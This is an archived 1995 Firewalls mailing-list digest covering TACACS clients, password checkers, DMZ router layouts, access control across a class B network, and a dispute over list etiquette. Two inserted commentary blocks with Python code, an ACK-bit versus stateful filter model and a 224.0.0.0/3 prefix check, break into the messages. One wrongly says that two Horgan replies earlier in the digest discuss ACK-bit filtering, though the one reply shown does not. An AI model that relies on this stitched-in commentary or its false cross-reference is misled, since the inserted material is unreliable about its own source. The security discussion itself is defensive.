~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Wed May 3 11:51:03 1995
Date: Wed, 3 May 1995 09:44:02 -0600
From: Rich Brown
To: Firewalls@greatcircle.com
Subject: tacacs unix client

Greetings,

We are looking for a tacacs client that runs on a unix system. We have the
tacacs server piece and have made it work with a cisco router.
However, we would like to do tacacs authentication from/to a unix system,
not through the cisco router. Any information is appreciated.

Thanks in advance.

_______________________________________________________________________________
Rich Brown, Network Administrator         Great-West Life
E-mail: rabr@gwl.com                      8505 E. Orchard Rd
Phone: 303/689-3174                       Englewood, Co 80111
_______________________________________________________________________________

From firewalls-owner Wed May 3 12:21:39 1995
Date: Wed, 03 May 95 14:54:28 -0400
From: marchany@vtserf.cc.vt.edu
To: casares@ix.netcom.com (michael smith)
Cc: s0ujgg@pacific.fnma.com (Joseph Gerrity), firewalls@greatcircle.com,
    marchany@vtserf.cc.vt.edu
Subject: Re: Policies

look in eff.org:/pub/CAF/policies for examples of acceptable use policies
from various institutions (academic and commercial). There are some
critiques of the policies in there also.
-Randy Marchany
VA Tech Computing Center

From firewalls-owner Wed May 3 12:40:41 1995
Date: Wed, 3 May 1995 14:58:29 -0400
From: "Jim Littlefield"
To: firewalls@greatcircle.com
Subject: Re: Security professionals at the Pentagon (fwd)

On May 3, 12:47pm, Ben wrote:
: Who feels secure knowing that this is the case at our local government
: offices?
:

I was thinking the same thing when I read his original posting. Kinda
scary, actually.
--
Jim Littlefield

From firewalls-owner Wed May 3 13:40:18 1995
Date: Wed, 3 May 1995 15:07:42 -0400 (EDT)
From: "James.C.Anderson"
To: Firewalls@greatcircle.com
Subject: skey on sunos 4.1.3 and "fascist" password program

Hi gang -

Is skey available for sunos 4.1.3? If so, where?

Also, a previous sysadmin showed me what he called the "fascist" password
changer (i.e. no dictionary words, wanted punctuation and/or digits in the
password). I'd like it for sunos 4.1.3 also.
Thanks

Jim

*******************************************************************************
Jim Anderson                          Williams College
Systems Manager                       Center for Computing
James.C.Anderson@williams.edu         Jesup Hall
413-597-2082                          Williamstown, MA 01267
*******************************************************************************

From firewalls-owner Wed May 3 13:56:00 1995
Date: Wed, 3 May 1995 15:06:40 -0400 (EDT)
From: Edward Maillet
To: firewalls@greatcircle.com
Subject: Summary of break in facts

Hey All,

I got 30-50 replies to my post looking for general information on recent
break-ins. Almost all of the replies were people requesting any information
I received. The list of information I have is small. As one reply commented,
most sites would be "reluctant" to admit a break in let alone the details.

The List:

The Australian Computer Abuse Research at RMIT publishes 'Profiles of
Computer Abuse in Australia'. The cost is about $7.00 (US) and the person
in charge is Vic Kamay.

Read F. Cohen's "Protection and Security on the Information Superhighway"
John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp. $24.95 (US?)

There seems to be a new list on Intrusion Detection Systems (IDS) reachable
at ids@uow.edu.au

That's all I have.
-----
Ed Maillet
maillet@usmcs.maine.edu

From firewalls-owner Wed May 3 14:09:09 1995
Date: Wed, 3 May 1995 11:07:04 -0700 (PDT)
From: Bob Lanning
To: firewalls@greatcircle.com
Subject: distributed passwd program

I am running 7 different unices.

    SunOS 4.1.1
    Solaris 2.3
    OSF/1 1.3
    Ultrix 4.2
    AIX 3
    HP-UX 9.01
    SCO/OpenDesktop 3.2

Is there a passwd program that I can get that will run on all of them, that
would distribute the passwd entries across all the machines? I would like
to do it securely (host verification, encrypted data stream ...)

Thanks in advance,
Bob

/* ________just a comment_________________
   Robert Hajime Lanning           "No more blah, blah, blah!"
   Systems Administrator               -- Kirk, "Miri", stardate 2713.6
   TYECIN Systems, Inc.
   Four Main Street                "Emotions are alien to me. I'm a scientist."
   Los Altos, California 94022         -- Spock, "This Side of Paradise",
   Voice: (415) 949-8501               stardate 3417.3
   Fax: (415) 949-8505
   E-Mail: lanning@tyecin.com
   "Software Tools for Manufacturing Management"
*/

From firewalls-owner Wed May 3 15:04:52 1995
Date: Wed, 03 May 95 14:52:00 CDT
From: Craig McLellan
To: Firewalls
Subject: FW: Firewalls with distributed GUI management interfaces

>The (now) 3 products:
> - Brimstone from SOS
> - Firewall-1
> - A soon-to-be-released product from Cohesive
>All claim to have GUIs that allow remote management of multiple
>firewalls and automated setting of most common options (what to pass
>from and to where, what to detect, how to respond, etc.).
>From my limited conversations with them, none are perfect, but at least
>two are fairly well thought out. No verification done by experiment.

You should also check out the Network Systems Corporation security router
PCF Tools facility.
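Patrick Horgan's two replies earlier in this digest turn on the same design question: a filter that passes inbound packets "simply on the basis of the ack bit" versus one that knows which connections inside hosts actually opened. The toy model below, added here as an illustration and not code from the thread or from any product named in it, puts the two inbound policies side by side on the same four constructed packets (the 10.1.x.x prefix, the hosts and the ports are all made up); the connection-tracking variant goes a step beyond what the posts spell out.

```python
from dataclasses import dataclass

# Added illustration for the "returning packets on the basis of the ACK bit"
# discussion: two toy inbound-filter policies side by side. Network prefix,
# hosts, ports and packets are constructed for the example.

INSIDE_PREFIX = "10.1."  # hypothetical internal network (constructed)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool
    ack: bool


def is_inside(addr: str) -> bool:
    return addr.startswith(INSIDE_PREFIX)


def ack_bit_filter(pkt: Packet) -> bool:
    """Stateless policy: pass anything from inside; pass inbound only if ACK is set.

    The intent is "only replies to our own connections come back in", but the
    ACK flag is just a bit the sender chooses, so an outside host can address
    any internal port with ACK set and this rule waves it through. The
    receiving TCP stack normally answers such a stray segment with RST; that
    is the "other things" which must not be broken for the design to hold.
    """
    if is_inside(pkt.src):
        return True
    return pkt.ack


class StatefulFilter:
    """Connection-tracking policy: inbound must match a flow opened from inside."""

    def __init__(self) -> None:
        # (inside_addr, inside_port, outside_addr, outside_port)
        self.flows: set[tuple[str, int, str, int]] = set()

    def check(self, pkt: Packet) -> bool:
        if is_inside(pkt.src):
            if pkt.syn and not pkt.ack:  # new outbound connection request
                self.flows.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return True
        # Inbound: allowed only if it is the reverse of a tracked flow.
        return (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.flows


def run_scenario() -> dict[str, tuple[bool, bool]]:
    """Return {name: (ack-bit verdict, stateful verdict)} for four packets, in order."""
    stateful = StatefulFilter()
    packets = [
        # inside host opens a connection to an outside web server
        ("outbound_syn", Packet("10.1.0.5", 40000, "192.0.2.80", 80, syn=True, ack=False)),
        # the server's legitimate SYN/ACK reply to that connection
        ("reply_synack", Packet("192.0.2.80", 80, "10.1.0.5", 40000, syn=True, ack=True)),
        # an unsolicited inbound segment with ACK set, aimed at the telnet port
        ("forged_ack", Packet("203.0.113.9", 12345, "10.1.0.5", 23, syn=False, ack=True)),
        # an unsolicited inbound connection attempt to the same port
        ("unsolicited_syn", Packet("203.0.113.9", 12345, "10.1.0.5", 23, syn=True, ack=False)),
    ]
    verdicts: dict[str, tuple[bool, bool]] = {}
    for name, pkt in packets:
        verdicts[name] = (ack_bit_filter(pkt), stateful.check(pkt))
    return verdicts


if __name__ == "__main__":
    for name, (ack_only, tracked) in run_scenario().items():
        print(f"{name:16s} ack-bit filter: {'pass' if ack_only else 'drop':4s}  "
              f"stateful: {'pass' if tracked else 'drop'}")
```

Only the third packet separates the two policies: the ACK-only rule passes it because the flag is set, while the tracking filter drops it because no inside host ever opened a connection to that source.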
From firewalls-owner Wed May 3 15:11:09 1995
Date: Wed, 3 May 1995 13:21:40 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
To: bwern@jax.jaxnet.com, Firewalls@greatcircle.com, avolio@tis.com
Subject: Re: Help with beginning options?

> 1. If you won't get money for it, don't do it. Security is too important.
> You need to establish that there is a business requirement for your
> company to connect up to the Internet. Then you need to establish what
> the risks are. The cost model should show that it is worth spending money
> to protect your assets or it will show that you don't need an Internet
> connection enough to justify the cost. The middle ground of "scrimping"
> does not belong in the equation.

That sounds reasonable, but I'd bet that most of the firewalls on the
internet were put together on a shoestring by someone that had an interest.

> 2. No "sacrificial lamb" systems. Any system on the DMZ has to be
> protected as well as the firewall. Why? Because I have never yet met
> someone in business who was willing to have any of their systems broken
> into.
> Reasons: 1) The report in the NY Times will just say you were
> hacked, not that it was a sacrificial system (or if it does, it'll say it
> somewhere 10 pages into the paper); 2) your sacrificial lamb system will
> be used as a jump off point to launch attacks against MIT or against
> some elementary school in Arizona or against whitehouse.gov; 3) your lamb
> will be used as a storage point for recipes for bombs or for kiddie porn;
> and 4) the term "sacrificial" you will find pertains to you and your
> job, not the system :-).

One more reason, your sacrificial lamb is an ideal place to install a
sniffer to watch all unencrypted packets going into your firewall.

Patrick

--
These opinions are mine, and not Amdahl's (except by coincidence;).
Patrick J. Horgan        Amdahl Corporation
patrick@amdahl.com       1250 East Arques Avenue          Have Sword
Phone : (408)992-2779    P.O. Box 3470 M/S 316            Will Travel
FAX   : (408)773-0833    Sunnyvale, CA 94088-3470         O16-2294

From firewalls-owner Wed May 3 15:48:19 1995
Date: Wed, 3 May 95 17:08:49 CDT
From: amolitor@anubis.network.com (Andrew Molitor)
To: firewalls@greatcircle.com
Subject: Re: Security professionals at the Pentagon (fwd)

Can we avoid
the busting on random people who are most likely not here to defend
themselves, and try to get our little minds out of the 'All the world's
Unix, and anyone who doesn't see the world through Unix colored glasses is a
moron' gutter?

Perhaps it's just me, but I don't think this is an appropriate forum for
ridiculing people for not being Unix experts. I'm not sure what is an
appropriate forum, actually, but again, perhaps it's just me.

Andrew

From firewalls-owner Wed May 3 16:09:26 1995
Date: Wed, 3 May 95 08:50:19 MDT
From: firewall@virtual.cuc.ab.ca (Firewall mailing list)
To: firewalls@GreatCircle.COM
Subject: mirror site(s) for ip_fil2.5.2 ?

i am interested in inspecting ip_fil2.5.2, but can never seem to get on to
the anonymous server at coombs.anu.edu.au. are there mirror sites for this
package, or failing that, can some kind soul email me aforementioned
package?
From firewalls-owner Wed May 3 16:16:32 1995
Date: Wed, 3 May 1995 17:56:17 -0400 (EDT)
From: fc@all.net (Dr. Frederick B. Cohen)
To: firewalls@greatcircle.com
Subject: password checking program to force hard-to-guess passwords

Naturally - we have one - see our W3 server listed below for details.

--
Management Analytics     216-686-0090 - PO Box 1480, Hudson, OH 44236
Check out info-security heaven and test your system for known
vulnerabilities (1st time for free) at URL: http://all.net:8080
(scans deeper than SATAN or ISS)
Read "Protection and Security on the Information Superhighway"
John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95

From firewalls-owner Wed May 3 16:24:19 1995
Date: Wed, 03 May 95 17:04:00 PDT
From: laxnn@TRANE.LAXBLDG17.lax.trane.com
From: "Norton, Dave"
To: 'firewalls list'
Subject: Marchany re Policies

Randy, please indulge me and be a little more explicit about how one gets
to this info... I don't seem to be able to get into "eff.org"... So as not
to offend the rocket scientists in the list, please direct any help you can
offer to my apparently "newbie" question to "dnorton@trane.com"...
(Networks to run, no time to surf)...

Thanx !

Dave Norton
Trane / LaCrosse, WI

----------
>look in eff.org:/pub/CAF/policies for examples of acceptable use policies from
>various institutions (academic and commercial). There are some critiques of
>the policies in there also.
>Randy Marchany
>VA Tech Computing Center

From firewalls-owner Wed May 3 17:15:31 1995
From: "J."
Date: Wed, 3 May 1995 19:49:43 -0400 (EDT)
To: amolitor@anubis.network.com (Andrew Molitor)
Cc: firewalls@GreatCircle.COM
Subject: Re: Security professionals at the Pentagon (fwd)

] Can we avoid the busting on random people who are most likely not
] here to defend themselves, and try to get our little minds out of the

They're not.

] 'All the world's Unix, and anyone who doesn't see the world through
] Unix colored glasses is a moron' gutter?

Good idea. Besides, a big part of the problem is that the person who
requested the help is deaf. He's bright, he's learning; so perhaps security
is not his forte -- but I'd be willing to bet he could outdo the person who
criticized him in something else.

] Perhaps it's just me, but I don't think this is an appropriate
] forum for ridiculing people for not being Unix experts. I'm not sure what
] is an appropriate forum, actually, but again, perhaps it's just me.

It's not just you.
From firewalls-owner Wed May 3 18:09:10 1995
From: Brent@GreatCircle.COM (Brent Chapman)
To: Ben, Marco Polo, Matthew Elvey, firewalls@greatcircle.com
Date: Wed, 3 May 1995 18:01:02 -0800
Subject: Re: Security professionals at the Pentagon (fwd)

At 12:47 PM 5/3/95, Ben wrote:
>Who feels secure knowing that this is the case at our local government
>offices?

What's this got to do with Firewalls?

And whose local government offices are you referring to? 25% of the subscribers to Firewalls are from non-USA domains.

Such postings as this and the "Dan Farmer Rap" posted last month, which are would-be attempts at humor at the expense of some individual or group, are not welcome on the Firewalls mailing list.
-Brent

----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule
of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                                Great Circle Associates
Brent@GreatCircle.COM                        1057 West Dana Street
+1 415 962 0841                              Mountain View, CA 94041

From firewalls-owner Wed May 3 18:39:21 1995
From: Sick Puppy
Subject: Access control across a large network - firewall or other system?
To: firewalls@GreatCircle.com
Date: Wed, 3 May 1995 21:23:47 -0400 (EDT)

The following describes a real life situation.

There is a large (class B) network that has users performing much different functions on different subnets. They have about 200 subnets (class C networks) connected together through several Cisco 7000 routers.

For pretty good reasons the users of different subnets don't trust each other. In particular, some of the programmers of financial systems have tried to crack accounts of other people on database systems that the financial programmers are not supposed to use. Users on some subnets are paranoid that the work they are doing might be leaked to the press while users on other subnets really like the attention they get from the press.
As the network has grown, some users have installed their own insecure dial-up links to other networks instead of using the secure corporate links.

For all I know, this could describe many large corporations. However, there is a clear need to protect the different subnets from each other and to limit what other systems in the class B network the users on any particular subnet can connect to. In short, they need a centralized access control mechanism that blocks unwanted connections.

I know that the Night Hawk from Harris Corp. can be used to provide this kind of centralized access control and in fact it is the only box I have come across that can do this kind of thing. I would like to know what other alternatives exist.

Could this kind of access control be provided by centralized firewalls or is some dedicated access control system needed?

Sick Puppy

From firewalls-owner Wed May 3 19:09:10 1995
From: bnowlin@nyjets.lerc.nasa.gov (Ben Nowlin)
Subject: Re: Security professionals at the Pentagon (fwd)
To: Brent@GreatCircle.COM (Brent Chapman)
Date: Wed, 3 May 95 21:43:44 EDT
Cc: samman@CS.YALE.EDU, mrami@mramirez.sy.YALE.EDU, elvey@CS.YALE.EDU, firewalls@greatcircle.com

> > >Who feels secure knowing that this is the case at our local government
> > >offices?
>
> What's this got to do with Firewalls?
>
> And whose local government offices are you referring to? 25% of the
> subscribers to Firewalls are from non-USA domains.
>
> Such postings as this and the "Dan Farmer Rap" posted last month, which are
> would-be attempts at humor at the expense of some individual or group, are
> not welcome on the Firewalls mailing list.
>
>
> -Brent

Thank you,

Ben

--
______________________________________________________________________________
 Ben Nowlin                 | If you don't get what you want in life, it's either
 NASA Lewis Research Center | a sign that you seriously didn't want it, or that
 ben@lerc.nasa.gov          | you tried to BARGAIN over the PRICE.
______________________________________________________________________________

From firewalls-owner Wed May 3 19:39:12 1995
From: "Bui, Hung"
To: firewalls@GreatCircle.COM
Date: Tue, 02 May 95 17:27:37 EST
Subject: Raptor Eagle

Hi all,

Does anyone have any opinions on a firewall product from Raptor called Eagle?

Thanks for your help.
Hung Bui
hsb@zen.hq.adied.oz.au

From firewalls-owner Wed May 3 19:56:50 1995
From: Carl Jolley
To: Sick Puppy
cc: firewalls@GreatCircle.COM
Date: Wed, 3 May 1995 22:37:31 -0400 (EDT)
Subject: Re: Access control across a large network - firewall or other system?

On Wed, 3 May 1995, Sick Puppy wrote:

> The following describes a real life situation.
>
> There is a large (class B) network that has users performing much
> different functions on different subnets. They have about 200 subnets
> (class C networks) connected together through several Cisco 7000
> routers.
> For pretty good reasons the users of different subnets don't trust each
> other. In particular, some of the programmers of financial systems have
> tried to crack accounts of other people on database systems that the financial
> programmers are not supposed to use. Users on some subnets are paranoid that
> the work they are doing might be leaked to the press while users on other
> subnets really like the attention they get from the press. As the network has
> grown, some users have installed their own insecure dial-up links to
> other networks instead of using the secure corporate links.
>
> For all I know, this could describe many large corporations. However,
> there is a clear need to protect the different subnets from each other
> and to limit what other systems in the class B network the users on
> any particular subnet can connect to. In short, they need a centralized
> access control mechanism that blocks unwanted connections.

This Class B network belongs to one organization or corporation??? If this is true, then what they need first and foremost is a corporate security policy. It might include something like:

"Any employee of this company who cracks or tries to crack anyone's account, whether that other person is an employee of this company or not, is subject to immediate termination of employment and will be reported to the appropriate law enforcement agencies for prosecution."

>
> I know that the Night Hawk from Harris Corp. can be used to provide this
> kind of centralized access control and in fact it is the only box I
> have come across that can do this kind of thing. I would like to know what
> other alternatives exist.
>
> Could this kind of access control be provided by centralized firewalls or is
> some dedicated access control system needed?
>
> Sick Puppy
>
>
>

**** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer ****

From firewalls-owner Wed May 3 20:09:24 1995
From: fc@all.net (Dr. Frederick B. Cohen)
Subject: Pentagon security professionals
To: firewalls@greatcircle.com
Date: Wed, 3 May 1995 22:42:01 -0400 (EDT)

Boy - you firewallers are touchy aren't you.
Someone makes a few comments about national security and everyone hops on the posting party like they were posting something more interesting and open discussion of such things is somehow wrong. I thought the posting was entirely appropriate but then many of my postings are hated as well.

So here's my nickel:

DISA is generally far better at security than that example showed. Furthermore, they are understaffed and overworked and defending our country (the US) against ongoing attacks. If you're not from the US try not to be offended by a little bit of patriotism. Our country needs defending and we help to defend much of the rest of the world.

This notwithstanding, that level of naivety should give notice to those of us who know more that our educational functions have not been adequately fulfilled. Many people charged with similar roles in large financial institutions face similar knowledge gaps.

I think that this is highly relevant to firewalls and is the kind of thing we need to see on occasion to remind us of the size of the gap between the discussions on this forum and most of the information technology world.

Please feel free to flame away.
--
-----------------
 \Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236
  \   /\/      | Check out info-security heaven and test your system
   \/\ /\/     | for known vulnerabilities (1st time for free) at URL:
    \/Analytics| (scans deeper than SATAN or ISS) http://all.net:8080
-----------------
Read "Protection and Security on the Information Superhighway"
John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95

From firewalls-owner Wed May 3 20:28:42 1995
From: Tim Keanini
To: firewalls@greatcircle.com
Date: Wed, 3 May 1995 19:28:31 -0700 (PDT)
Subject: blocking class D and class E address at the filter

Hello,

I have a concern that I want to ask the firewall community.

In BSD4.4, there is no way to take MULTICAST out of the kernel period. At least, that is what I have been told about my BSD/OS 2.x that is based on the 4.4BSD code. Yes I have the source licence but there is the answer that I got from BSD/OS.

At my packet filters, I would like to block addresses that are 224.0.0.0 and above. I am wondering what you folks think about this:

    deny 224.0.0.0/3 DMZnet/24 log

If my TI-36x Solar calculator is correct, this should mean that Class D and Class E should match the source IP and be blocked.

Anyone with any luck on this? I am going to try it tomorrow at my test site.
--blast

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 Tim Keanini  |  "The limits of my language,
 aka blast    |   are the limits of my world."
              |                     --Ludwig Wittgenstein
 for more info on BayMOO... email baymoo@worldbit.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Wed May 3 20:39:10 1995
From: steveg@cseic.saic.com (Stephen Harold Goldstein)
To: cjolley@iac.net
Cc: rgm3@is.chrysler.com, bdboyle@maverick.erenj.com, firewalls@GreatCircle.COM
Date: Wed, 3 May 95 23:13:50 EDT
Subject: Re:TRUST US

Re:
> At 09:31 AM 4/28/95 -0400, Carl Jolley wrote:
> >
> >I once asked the Technical Support Manager of a data center what his
> >disaster recovery plan for his data center was and he told me that his
> >disaster recovery plan was: if a disaster occurred, he would turn in his
> >resignation. His logic was that the risk of getting hit by a disaster
> >was low but the probability of him having to do a lot of work to develop
> >the plan was high, so....
>

Anyone who gets that kind of answer should respond with the following:

"Let's save you some time. I'll expect your letter of resignation on my desk by the close of business."
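Checking the arithmetic behind Tim Keanini's "deny 224.0.0.0/3 DMZnet/24 log" rule from the "blocking class D and class E address" post above, as an added example that is not part of any message in this digest. The prefix test is worked by hand rather than through a library so the reader can see why a 3-bit prefix on 224.0.0.0 covers exactly the old class D and class E ranges; 192.0.2.0/24 is a placeholder standing in for his DMZnet/24.

```python
# Added example: does "deny 224.0.0.0/3 DMZnet/24 log" match exactly the
# classful D and E ranges, as the post claims?  Prefix arithmetic by hand.

RULE_PREFIX = "224.0.0.0/3"     # source prefix from the post
DMZ_NET = "192.0.2.0/24"        # placeholder for DMZnet/24 (RFC 5737 test range)


def ip_to_int(addr):
    """Dotted quad -> 32-bit integer; rejects malformed input."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError("bad IPv4 address: %r" % addr)
    octets = [int(p) for p in parts]
    if any(not 0 <= o <= 255 for o in octets):
        raise ValueError("bad IPv4 address: %r" % addr)
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def int_to_ip(n):
    """32-bit integer -> dotted quad."""
    return "%d.%d.%d.%d" % ((n >> 24) & 255, (n >> 16) & 255, (n >> 8) & 255, n & 255)


def prefix_mask(plen):
    """Netmask for a prefix length: the top plen bits set."""
    return (0xFFFFFFFF << (32 - plen)) & 0xFFFFFFFF if plen else 0


def in_prefix(addr, prefix):
    """True if addr falls inside prefix (e.g. "224.0.0.0/3"): only the
    high plen bits are compared, everything below them is don't-care."""
    net, plen = prefix.split("/")
    mask = prefix_mask(int(plen))
    return (ip_to_int(addr) & mask) == (ip_to_int(net) & mask)


def prefix_range(prefix):
    """First and last address covered by a prefix, as dotted quads."""
    net, plen = prefix.split("/")
    mask = prefix_mask(int(plen))
    lo = ip_to_int(net) & mask
    return int_to_ip(lo), int_to_ip(lo | (~mask & 0xFFFFFFFF))


def classful(addr):
    """Class by leading bits, as 1995-era routers understood it:
    0xxx = A, 10xx = B, 110x = C, 1110 = D (multicast), 1111 = E (reserved)."""
    first = ip_to_int(addr) >> 24
    if first & 0x80 == 0:
        return "A"
    if first & 0xC0 == 0x80:
        return "B"
    if first & 0xE0 == 0xC0:
        return "C"
    if first & 0xF0 == 0xE0:
        return "D"
    return "E"


def prefix_equals_classes_d_and_e(prefix=RULE_PREFIX):
    """Exhaustive check: the prefix matches an address exactly when the
    address is class D or E.  Both tests depend only on the first octet,
    so 256 probes cover the whole address space."""
    for first in range(256):
        probe = "%d.1.2.3" % first
        if in_prefix(probe, prefix) != (classful(probe) in ("D", "E")):
            return False
    return True


def rule_fires(src, dst):
    """Evaluate the post's rule: deny when the SOURCE is in 224/3 and the
    destination is on the DMZ.  A multicast or reserved source address is
    never legitimate, so dropping such packets is always safe."""
    return in_prefix(src, RULE_PREFIX) and in_prefix(dst, DMZ_NET)


if __name__ == "__main__":
    print("224.0.0.0/3 spans", prefix_range(RULE_PREFIX))
    print("matches exactly classes D+E:", prefix_equals_classes_d_and_e())
    # Constructed sample packets, not captured traffic.
    samples = [("239.1.1.1", "192.0.2.10"),          # class D source -> DMZ: deny
               ("255.255.255.255", "192.0.2.10"),    # class E source -> DMZ: deny
               ("223.255.255.255", "192.0.2.10"),    # last class C address: pass
               ("239.1.1.1", "198.51.100.5")]        # not a DMZ destination: rule silent
    for src, dst in samples:
        print(src, "->", dst, "deny" if rule_fires(src, dst) else "pass")
```

Note that the rule tests 224/3 as the source address; a multicast datagram carries a multicast destination, so keeping multicast traffic off the DMZ also needs a companion rule on the destination field.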
From firewalls-owner Wed May 3 20:44:33 1995
From: gtennan@interlog.com (Gil Tennant)
To: firewalls@GreatCircle.com
Date: Wed, 03 May 95 22:20:43 EDT
Subject: Re: PC site security

On Wed, 03 May 1995 07:20:23 -0500 you wrote:

>> Christopher J. Calabrese
>> Network Security Architect
>> Novell Information Services & Technology, Summit, NJ
>> cjc@summit.novell.com
>>
>> PC clients that are visible to the world don't currently
>> constitute a security problem
>
>I believe this should be understood with the caveat that *no*
>packages with daemons for telnet, ftp, ... are installed on
>the PC nor is the PC running server software such as
>X-windows.
>
>> - - Don't rely on your security policy to keep users
>> from installing software that will compromise your site.
>> They may install software they don't even _know_ is
>> a security risk.
>
>IMHO the vast majority of NetWare LAN Administrators
>(perhaps not CNEs) are also unaware of how easy it is to
>install software packages that will compromise a site with
>daemons.

In a similar style of question (excuse me as I missed the thread)...

If my employer has a PC SLIPped into the Internet (running a telnet client or ftp client, or IRC for that matter), would they be open for intrusion from a would-be unscrupulous party?
Must they be running a daemon? And if they were logged into the Netware LAN, wouldn't this lead to a further security risk, if daemons are not required to be running, to cause a security problem?

What minimum "Internet software" utilities would allow for a security risk in a SLIP situation, on a DOS/Windows PC (with and without LAN connection as well)?

Gil

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*
*                                                                           *
* Gil Tennant - gtennan@io.org, @ibm.net, @interlog.com, CIS:74511,3651     *
* Systems Technical Specialist - Web Page.. http://www.io.org/~gtennan      *
* Novell Network Installer/Administrator (working on my CNE), Technical     *
* software support in Microsoft, Lotus, modem communications software and   *
* many other software applications, OS/2 Support at Internex Online...      *
*                                                                           *
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*

From firewalls-owner Wed May 3 20:50:46 1995
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Subject: Re: Access control across a large network - firewall or other system?
To: sikpuppy@maestro.com (Sick Puppy)
Date: Wed, 3 May 1995 22:26:19 -0500 (EST)
Cc: firewalls@GreatCircle.com

What you have just described is a _very_ familiar scenario in my life on a day-to-day basis, as well as images that wake me up at night with the heebie jeebies. This is a continually surfacing issue with networks that we have built, designed, redesigned and/or manage(d).

If a centralized access control mechanism is needed in a scenario such as this, centralized network management is the key. You simply toss effectiveness to the four winds when you allow autonomous management of the same IP address space. The onus is on corporate network management to dictate policy. Otherwise, it's every man for himself, to coin a phrase.

Certainly access-control, and route propagation, can be controlled rather effectively from a fringe-point on a large corporate network, in the right hands.

- paul

(sorry for the entire quote -- it's relevant.)

>
> The following describes a real life situation.
>
> There is a large (class B) network that has users performing much
> different functions on different subnets. They have about 200 subnets
> (class C networks) connected together through several Cisco 7000
> routers.
> For pretty good reasons the users of different subnets don't trust each
> other. In particular, some of the programmers of financial systems have
> tried to crack accounts of other people on database systems that the financial
> programmers are not supposed to use. Users on some subnets are paranoid that
> the work they are doing might be leaked to the press while users on other
> subnets really like the attention they get from the press. As the network has
> grown, some users have installed their own insecure dial-up links to
> other networks instead of using the secure corporate links.
>
> For all I know, this could describe many large corporations. However,
> there is a clear need to protect the different subnets from each other
> and to limit what other systems in the class B network the users on
> any particular subnet can connect to. In short, they need a centralized
> access control mechanism that blocks unwanted connections.
>
> I know that the Night Hawk from Harris Corp. can be used to provide this
> kind of centralized access control and in fact it is the only box I
> have come across that can do this kind of thing. I would like to know what
> other alternatives exist.
>
> Could this kind of access control be provided by centralized firewalls or is
> some dedicated access control system needed?
>
> Sick Puppy
>
>
>

_______________________________________________________________________________
Paul Ferguson                                   US Sprint
Managed Network Engineering                     tel: 703.689.6828
Reston, Virginia USA                            internet: paul@hawk.sprintmrn.com
                                                http://www.sprintmrn.com

From firewalls-owner Wed May 3 21:09:27 1995
From: Carl Jolley
To: Stephen Harold Goldstein
cc: rgm3@is.chrysler.com, bdboyle@maverick.erenj.com, firewalls@GreatCircle.COM
Date: Wed, 3 May 1995 23:59:40 -0400 (EDT)
Subject: Re:TRUST US

This sort of snappy retort would have
been quite out of place since he didn't work for me and in fact, he and I didn't work for the same company.

**** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer ****

On Wed, 3 May 1995, Stephen Harold Goldstein wrote:

> Re:
> > At 09:31 AM 4/28/95 -0400, Carl Jolley wrote:
> > >
> > >I once asked the Technical Support Manager of a data center what his
> > >disaster recovery plan for his data center was and he told me that his
> > >disaster recovery plan was: if a disaster occurred, he would turn in his
> > >resignation. His logic was that the risk of getting hit by a disaster
> > >was low but the probability of him having to do a lot of work to develop
> > >the plan was high, so....
> >
>
> Anyone who gets that kind of answer should respond with the following:
>
> "Let's save you some time. I'll expect your letter of resignation on my
> desk by the close of business."
>

From firewalls-owner Thu May 4 05:39:38 1995
From: alans@caseydog.East.Sun.COM (Alan Sonnenberg - SunNetworks)
To: janb@olymp.fer.uni-lj.si
Date: Thu, 4 May 1995 08:32:46 -0400
Subject: Re: Screened subnet with one router?
Cc: Firewalls@GreatCircle.COM

hello--

If I had to vote between the choices in your message, I would take number 1 and if it makes sense to the customer, I would use two separate vendors for my packet filtering devices. My hope would be that a problem used to circumvent R1 could not be used on R2. The thing I don't like about design two is that it produces a single point of failure in my security policy, i.e., break my packet filter and you are home free.

A common design I use is a slight modification to design one:

                         |
                         | external DMZ, web, anon ftp, etc.
                         |
             --          |          --
 Internet -->|R1|--------+----------|R2|----- inside net
             --          |          --
                   Bastion host     |DMZ
                                    |

In the above design configure the ISP's router (R1) in such a way that all Internet TCP circuits terminate on the "bastion" (or external DMZ machines). If you have "playful" internal users put in a third router between R2 and the inside net. Configure that router so that all internal TCP circuits terminate on the bastion. This will prevent internal users from "playing" with R2. Configure R2 with the appropriate filters. Don't forget to secure your bastion host, patches, removal of unneeded services, etc., etc..........

hope this helps,

alan sonnenberg

:-->
:--> > Is there any difference in the security of a screened subnet firewall
:--> > using two routers (one serial-ethernet, the second ethernet-ethernet)
:--> > opposed to using one router with serial-ethernet-ethernet interfaces?
:--> >
